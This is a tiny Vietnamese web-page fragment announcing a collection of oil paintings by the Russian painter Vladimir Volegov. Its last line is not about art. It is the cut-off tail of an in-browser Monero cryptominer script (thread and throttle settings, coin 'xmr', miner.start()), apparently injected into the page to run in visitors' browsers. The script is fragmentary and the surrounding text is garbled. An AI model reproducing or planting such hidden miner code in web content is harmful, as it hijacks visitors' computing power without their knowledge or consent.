Những bức sơn dầu của Họa sĩ người Nga Vladimir Volegov. - Nguyễn Trung Quân sưu tầm -

Những bức sơn dầu của Họa sĩ người Nga Vladimir Volegov.
 ', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();